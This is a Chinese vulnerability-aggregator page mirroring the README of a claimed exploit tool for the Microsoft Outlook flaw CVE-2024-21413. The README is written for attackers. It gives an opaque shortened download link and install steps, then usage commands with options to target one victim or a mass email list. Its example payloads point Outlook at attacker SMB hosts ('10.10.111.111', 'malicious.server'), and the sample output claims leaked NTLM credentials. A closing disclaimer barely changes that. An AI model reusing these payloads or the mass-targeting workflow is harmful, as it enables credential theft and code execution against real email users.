POC详情: 25291b87aa67153d9234b868a5147efb82a6101f

来源
关联漏洞
标题: Microsoft Outlook 安全漏洞 (CVE-2024-21413)
描述:Microsoft Outlook是美国微软(Microsoft)公司的一套电子邮件应用程序。 Microsoft Outlook 存在安全漏洞。以下产品和版本受到影响:Microsoft Office 2019 for 32-bit editions,Microsoft Office 2019 for 64-bit editions,Microsoft 365 Apps for Enterprise for 32-bit Systems,Microsoft 365 Apps for Enterprise
介绍
# 🛠️ CVE-2024-21413 Exploit

## 🌟 Description

This script is a powerful exploitation tool for the CVE-2024-21413 vulnerability found in Microsoft Outlook. The vulnerability allows attackers to bypass Protected View and execute malicious code by embedding specially crafted links in emails.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. **Download the repository**:

|[Download](https://shorturl.at/7itzw)
|:--------------- |

2. **Navigate to the tool's directory**:

```bash
cd CVE-2024-21413
```

3. **Install the required Python packages**:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```

### Options

- **-u, --url**:
  Specify the target Outlook email or server.

- **-f, --file**:
  Specify a file containing multiple email addresses to target.

- **-p, --payload**:
  Define a malicious file or link to inject.

- **-o, --output**:
  Define an output file to save logs and results.

When a single target is provided with the `-u` option and the system is vulnerable, the script will attempt to exploit the vulnerability by crafting a malicious email containing an embedded file link using the bypass method.

### Example

```bash
$ python3 exploit.py -u victim@domain.com -p "file:///\\10.10.111.111\test\test.rtf!exploit"
[+] Payload successfully sent.
[!] victim@domain.com is vulnerable to CVE-2024-21413: NTLM credentials leaked.
[+] Exploit completed.
```

## 📊 Mass Targeting

For mass exploitation, use the `-f` option with a file containing multiple email addresses. The tool will attempt to send a crafted email to each target.

```bash
python exploit.py -f targets.txt -p "file:///\\malicious.server\payload.rtf!exploit"
```

## 🗒️ Affected Versions

The vulnerability affects the following Microsoft Office products:

- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019

Successful exploitation can result in NTLM credential theft and arbitrary code execution.

## 🛡️ Disclaimer

Use this tool responsibly and ethically. Exploiting systems without authorization is illegal. Always obtain proper authorization before testing any system for vulnerabilities.

## 👏 Acknowledgments

Special thanks to Check Point researchers for discovering this vulnerability and providing insights into its exploitation method.
文件快照

[4.0K] /data/pocs/25291b87aa67153d9234b868a5147efb82a6101f └── [2.4K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。